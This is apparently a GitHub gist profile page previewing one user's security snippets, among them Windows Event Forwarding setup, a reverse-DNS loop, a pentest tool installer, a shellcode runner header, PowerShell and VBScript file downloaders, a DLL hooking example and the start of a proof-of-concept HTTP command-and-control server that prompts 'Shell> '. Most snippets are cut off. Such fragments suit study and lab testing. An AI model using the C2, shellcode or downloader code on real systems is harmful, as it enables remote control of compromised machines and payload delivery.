Skip to content

Instantly share code, notes, and snippets.

View macostag's full-sized avatar
🏠
Working from home

Mario macostag

🏠
Working from home
8 followers · 40 following
  • Peru
View GitHub Profile
@macostag
macostag / DomainComputers.xml
Last active August 31, 2018 01:22
Domain Computers subscription example. Source : https://blogs.technet.microsoft.com/jepayne/2015/11/23/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem/
<Subscription xmlns="http://schemas.microsoft.com/2006/03/windows/events/subscription">
<SubscriptionId>Domain Computer Events</SubscriptionId>
<SubscriptionType>SourceInitiated</SubscriptionType>
<Description>Important Domain Controller Events</Description>
<Enabled>True</Enabled>
<Uri>http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog</Uri>
<ConfigurationMode>MinLatency</ConfigurationMode>
<Query>
<![CDATA[<QueryList>
<Query Id="0" Path="Security">
@macostag
macostag / wef.ps1
Last active August 30, 2018 23:45
Configure Windows Event Forwarding.
#Collector:
#Setting WinRM service to automatic start and running quickconfig
Set-Service -Name WinRM -StartupType Automatic
Start-Service -Name WinRM
winrm quickconfig -quiet
#Set the size of the forwarded log
wevtutil sl forwardedevents /ms:1000000000
@macostag
macostag / rlookup.sh
Created August 19, 2018 22:31
IP reverse lookup bash script.
#!/bin/bash
rangeIp=""
for i in `seq 1 1 254`;
do
ip=$rangeIp.$i
#echo $ip
host $ip | grep "pointer";
done
@macostag
macostag / box-setup.sh
Last active October 15, 2019 20:56
Script designed for Ubuntu based distributions to install my own penetration testing toolsets. Tools are install in the /pte directory.
#!/bin/bash
#######################################
# Penetration testing toolset
#######################################
apt-get update
apt-get upgrade -y
#apt-get install whois -y
#apt-get install curl -y
#apt-get install wget -y
@macostag
macostag / shellcode-runner.py
Created June 10, 2018 03:13
PyInstaller Win32 shellcode runner.
#!/usr/bin/python
##############################################################
# PyInstaller Win32 shellcode runner - by @mihi42
#
# Needed software:
# * Python 2.7.2 from
# <http://www.python.org/download/releases/>
# * PyWin32 build 217 for Python 2.7 from
# <http://sourceforge.net/projects/pywin32/files/pywin32/>
@macostag
macostag / download.ps1
Created June 3, 2018 02:36
Download files using Powershell
$storageDir = $pwd
$webclient = New-Object System.Net.WebClient
$url = ""
$file = ""
$webclient.DownloadFile($url,$file)
@macostag
macostag / download.vbs
Created June 3, 2018 02:35
Download files using VBscript
strUrl = WScript.Arguments.Item(0)
StrFile = Wscript.Arguments.Item(1)
Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0
Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0
Const HTTPREQUEST_PROXYSETTING_DIRECT = 1
Const HTTPREQUEST_PROXYSETTING_PROXY = 2
Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts
Err.Clear
@macostag
macostag / aes-demo.py
Created May 7, 2018 04:12
AES Encrypt/Decrypt demo
import os
from Crypto.Cipher import AES
counter = os.urandom(16)
#AES keys may be 128 bits (16 bytes), 192 bits (24 bytes) or 256 bits (32 bytes) long.
key = os.urandom(32)
# AES Encrypt
enc = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
encrypted = enc.encrypt("Secret")
@macostag
macostag / poc-http-cc.py
Created May 7, 2018 03:42
POC HTTP C&C
# HTTP SERVER
#--------------------------------------------
import BaseHTTPServer
import os, cgi
HOST_NAME = '172.16.20.201'
PORT_NUMBER = 80
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(s):
command = raw_input("Shell> ")
@macostag
macostag / hook-example.py
Last active May 7, 2018 00:33
DLL function hooking example
from winappdbg import Debug, EventHandler, System, Process
import sys
# this is the call back function
def YYYY( event, ra ,arg1 ,arg2, arg3):
# read 1 KB of the memory content
print process.read( arg2,1024 )
class MyEventHandler( EventHandler ):